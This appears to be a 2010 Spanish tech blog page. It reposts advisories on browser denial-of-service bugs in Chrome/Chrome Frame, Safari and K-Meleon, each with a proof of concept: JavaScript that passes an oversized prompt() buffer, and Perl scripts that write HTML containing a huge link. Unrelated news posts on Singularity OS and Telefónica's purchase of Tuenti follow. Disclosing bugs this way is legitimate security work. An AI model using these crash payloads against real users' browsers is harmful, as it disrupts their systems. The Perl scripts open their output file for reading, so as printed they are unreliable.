Google Chrome and Chrome frame Prompt DoS

16 agosto 2010 Publicado por cLimbo 0 comentarios
###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de "mensajes de alerta" cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.


###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongluencia en todos los sistemas :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################


<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>


################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>

################# EOF ###################


############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
------------

thz Lost ;-)

Singularity; un OS hecho con C#

12 agosto 2010 Publicado por cLimbo 0 comentarios
Hace unas horas fue anunciada la liberación de la versión 2.0 de Singularity RDK (Research Development Kit). Esto a través de código fuente y un archivo ISO arrancable. Ahora bien, ¿qué es Singularity? Es un prototipo de sistema operativo iniciado en 2003 por un equipo de investigación en Microsoft Research.



(click para agrandar)

Los investigadores detrás de Singularity buscan explorar, reexaminar y mejorar la calidad de la decisiones de diseño en la construcción de nuevos sistemas operativos. Puesto que estos están ubicados al fondo de casi cualquier pila de software, sus efectos son profundos.

Alrededor de Singularity también se están creando extensiones a lenguajes de programación, y desarrollando nuevas técnicas y herramientas para especificar y verificar de manera formal la conducta de los programas.

De forma arquitectónica, Singularity tiene tres características:

  1. Procesos aislados para la protección de programas y servicios del sistema.

  2. Canales de comunicación basados en contratos —especificaciones bien precisas—.

  3. Programas basados en manifiestos para la verificación de las propiedades del sistema.

De forma sorprendente, el núcleo de Singularity ha sido programado con éxito usando el lenguaje C#. En particular con el extraño lenguaje #Sing. Naturalmente, las demás partes del sistema fueron escritas en ensamblador, C/C++. Es importante reiterar que se trata de un prototipo, no de un sistema operativo completo que puedas instalar y usar de forma normal en tu equipo de cómputo.

Puedes conocer los detalles de diseño en alguno de los interesantes artículos de investigación que ha publicado el grupo encargado de Singularity. Por cierto, este sistema operativo es software de código abierto —esto es debatible— gobernado por la licencia no comercial sólo para uso académico —E. Park explica muy bien sus restricciones.




Vía | Bitelia

Safari for windows Long link DoS

04 agosto 2010 Publicado por cLimbo 0 comentarios
############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href="very long URL">click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable


############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
------------------
thz Lost ;-)
Etiquetas: , , ,

K-Meleon for windows about:neterror Stack Overflow DoS

Publicado por cLimbo 0 comentarios
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros 'c' 'd' si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; "haz clic aquí" o mediante window.location.replace url ('muy largo') o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)


windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)


############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################



################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
-------------
thz Lost ;-)

Telefónica compra Tuenti por 70 millones de euros

Publicado por cLimbo 0 comentarios

Telefónica ha comprado el 90% de Tuenti por 70 millones de euros. Mi compañero Miguel se hacía eco de una noticia publicada por el economista en la que aseguraba que Telefónica estaba preparando la compra de la red social, y la pasada noche parece que se ha confirmado. Los 70 millones que la compañía de César Alierta pagará por Tuenti suponen valorar la empresa en un total de 75 millones, y dicho porcentaje se alcanza al adquirir la participación del 30% perteneciente al fondo Qualitas Equity Partners desde hace aproximadamente dos años, además de la parte restante al equipo directivo de Tuenti.

Según las primeras informaciones todo parece indicar que, aunque tenga presencia directa en el Consejo de Administración de Tuenti, Telefónica se mantendrá al margen del desarrollo y la dirección que la red social vaya a tomar en los próximos meses.

Esto no es de extrañar teniendo en cuenta el pasado que Telefónica tiene en cuanto al desarrollo y manejo de redes sociales se refiere. Keteke, su gran apuesta, cerró hace poco más de un año con una difusión y unas estadísticas paupérrimas, y suponemos que ahora se querrán mantener al margen para observar cómo se trabaja en este tipo de ambientes, que son totalmente diferentes a los propios de la operadora de telecomunicaciones.

Según el diario Expansión< , que fue el primero en confirmar la noticia, esto puede ser también un movimiento defensivo por parte de Telefónica para evitar que otro rival y competidor se hiciese con los servicios de la red social para utilizarlo en su contra.

Sea como fuere, lo cierto es que 70 millones para Telefónica suponen tan sólo un 4.22% de los 1.656 millones de euros que ha obtenido como beneficio neto en el primer trimestre de este mismo año, por lo que no se arriesga una cantidad de dinero tan considerable en términos relativos.

A partir del momento que la compra sea aprobada y oficial podremos ir viendo cuál es la actitud que Telefónica adopta y cómo controlan el juguete que tienen en sus manos, que es, sin ninguna duda, muy apetitoso. Se habla de una posible expansión en diversos países de Latinoamérica, y de la casi segura integración en los móviles de la compañía, pero 70 millones dan para pensar en el futuro y en una visión estratégica.

El problema, como muchas otras veces, es que el público que integra estas redes se caracteriza por su movilidad de servicios. El caso de Tuenti todavía puede ser más pronunciado si tenemos en cuenta que de los ocho millones de usuarios activos que tiene en la actualidad, un porcentaje alto está formado por adolescentes y jóvenes por debajo de los 23-25 años.

Éstos son, al fin y al cabo, los más dados a ese tipo de migraciones.

Actualización: Zaryn Dentzel ha publicado un post en el blog oficial de Tuenti en el que confirma el acuerdo con Telefónica, añadiendo además lo siguiente:

La elección de un socio como Telefónica, una empresa de origen español como nosotros, que ya es un actor fundamental en el mercado global. Un socio que entiende que es importante garantizar la continuidad del proyecto y aporta músculo financiero y toda su experiencia en comunicaciones. Además nos permite mantener nuestra visión de producto y el compromiso de todos los que trabajamos en Tuenti con la privacidad de nuestros usuarios.





Vía | Genbeta